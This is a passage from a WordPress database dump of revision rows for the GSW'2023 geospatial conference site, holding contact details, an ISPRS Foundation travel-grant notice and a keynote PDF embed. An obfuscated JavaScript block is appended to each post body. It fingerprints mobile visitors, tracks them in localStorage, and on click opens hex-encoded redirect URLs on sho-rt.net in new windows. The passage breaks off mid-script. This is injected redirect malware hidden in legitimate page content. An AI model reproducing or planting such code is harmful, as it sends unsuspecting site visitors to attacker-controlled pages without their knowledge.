link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-24 23:40:02','2023-05-24 23:40:02','',3066,'https://gsw2023.com/?p=4576',0,'revision','',0),
(4577,1,'2023-05-24 23:42:43','2023-05-24 23:42:43','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\" title_font_style=\"font-weight:bold;\"]</p>\n<h5><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023</strong></h5>\n<p>The ISPRS Foundation (TIF) will be offering travel grants to deserving applicants, especially from developing countries, to participate in the <a href=\"https://gsw2023.com/\">Geospatial Week (Egypt GSW’2023)</a>, September 2023, Cairo, Egypt. Please note that The <a href=\"http://www.isprs.org/foundation/Default.aspx\">ISPRS Foundation</a> has limited amount of funds and therefore only limited number of grants will be offered. The following are the important dates for the applicants.</p>\n<p>&nbsp;</p>\n<h5><span style=\"font-size: 14pt;\"><strong>Important Dates for applicants for travel grants sponsored by The ISPRS Foundation.</strong></span></h5>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Deadline for submission of travel grant applications : June 16, 2023</li>\n<li>Decision and notification of successful applicants : July 15, 2023</li>\n<li>Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n</li>\n</ul>\n<p>&nbsp;</p>\n<p><strong>Applications can be done through below link,</strong><br />\n<a href=\"https://www.isprs.org/foundation/forms/Travel_Grants.aspx\">https://www.isprs.org/foundation/forms/Travel_Grants.aspx</a></p>\n<h4 class=\"gap-50\"></h4>\n<h4 id=\"respond\"></h4>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TRAVEL GRANTS','','inherit','closed','closed','','2665-revision-v1','','','2023-05-24 23:42:43','2023-05-24 23:42:43','',2665,'https://gsw2023.com/?p=4577',0,'revision','',0),
(4578,1,'2023-05-27 01:52:45','2023-05-27 01:52:45','<!-- wp:paragraph -->\r\n<p><strong>Prof. Deren Li, Chinese Academy of Sciences and the Chinese Academy of Engineering</strong></p>\r\n<p>[pdf-embedder url=\"https://gsw2023.com/wp-content/uploads/2023/05/Intelligent-remote-sensing-satellite-based-on-Internet一LuoJia03-1-Satellite-0331-1.pdf\" title=\"Intelligent remote sensing satellite based on Internet一LuoJia03-1 Satellite-0331\"]</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\"> </p>\r\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 